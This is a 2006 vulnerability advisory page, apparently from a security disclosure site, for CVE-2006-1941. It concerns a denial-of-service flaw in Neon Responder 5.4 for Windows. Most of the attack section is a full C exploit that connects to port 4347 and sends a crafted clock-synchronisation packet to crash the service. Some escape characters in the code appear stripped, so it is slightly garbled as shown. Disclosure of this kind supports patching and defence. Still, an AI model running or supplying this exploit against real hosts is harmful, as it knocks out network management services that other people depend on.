Neon Responder (Dos,Exploit)

2006.04.25
Credit: Stefan Lochbihler (steve01 chello at)
Risk: Low
Local: Yes
Remote: No
CVE: CVE-2006-1941
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Author: Stefan Lochbihler Date: 17.04.2006 Affected Software: Neon Responder for Windows Software 5.4 Software http://www.neon.com/NRwin.shtml Attack: Dos Overview: Neon Responders greatly enhance the functionality of LANsurveyor by providing LANsurveyor with direct access to computers with the Responder client installed. This direct access allows LANsurveyor to provide complete hardware and software asset reports, distribute software, and directly manage the client computers, either individually or as a group. Details: Through a specially crafted "Clock Synchronisation" packet an access violation occur and Neon Responder stops immediately. Exploit: /* Stefan Lochbihler*/ #include <stdio.h> #include <stdlib.h> #include <winsock2.h> #pragma comment(lib,"ws2_32") #define PORT 4347 char CLOCK_MSG [] = "x00x0ex5ax00x4cxe9x24xb1x17x88x40x84"; //Password = "" void usage (char*); void endpgr (char *,SOCKET, char*); unsigned long gethost (char *); int main(int argc, char *argv[]) { WSADATA wsa; SOCKET client; sockaddr_in peer; WORD wsVersion; char sendbuffer[16]=""; char recvbuffer[16]=""; unsigned long host=0; int err=0; if(argc<2) usage(argv[0]); printf("n~~~~~~ Neon Responder DoS - (c) by Stefan Lochbihler ~~~~~~nn"); if(WSAStartup(wsVersion=MAKEWORD(2,2),&wsa)!=0) { printf("WSAStartup() failn"); exit(0); } printf("%s:[+] Try to create socketn",argv[0]); client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(client==INVALID_SOCKET) endpgr(argv[0],client,"[-] socket() fail"); printf("%s:[+] Lookup hostn",argv[0]); if(!(host=gethost(argv[1]))) endpgr(argv[0],client,"[-] host not found !"); peer.sin_family = AF_INET; peer.sin_port = htons(PORT); peer.sin_addr.s_addr = host; printf("%s:[+] Connect to %sn",argv[0],argv[1]); err=connect(client,(SOCKADDR*)&peer,sizeof(struct sockaddr_in)); if(err) endpgr(argv[0],client,"[-] connect() fail"); memcpy(sendbuffer,CLOCK_MSG,sizeof(CLOCK_MSG)); printf("%s:[+] Try to send packetn",argv[0]); err=send(client,sendbuffer,sizeof(sendbuffer),0); err=recv(client,recvbuffer,sizeof(recvbuffer)-1,0); endpgr(argv[0],client,"[+] End successfully"); return 0; } void usage(char *pgrname) { printf("n~~~~~~ Neon Responder DoS - (c) by Stefan Lochbihler ~~~~~~nn"); printf("%s: <Targethost>n",pgrname); exit(0); } void endpgr (char *pgrname, SOCKET client,char *msg) { printf("%s:%sn",pgrname,msg); WSACleanup(); closesocket(client); exit(0); } unsigned long gethost(char *targethost) { unsigned long host=0; hostent *phost=NULL; host=inet_addr(targethost); if(host==INADDR_NONE) { if((phost=gethostbyname(targethost))==NULL) return 0; host=*(unsigned long*)phost->h_addr; } return host; } Vendor Status: The Vendor is informed ! Discovered and Copyright by Lochbihler Stefan http://www.xion-security.at


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top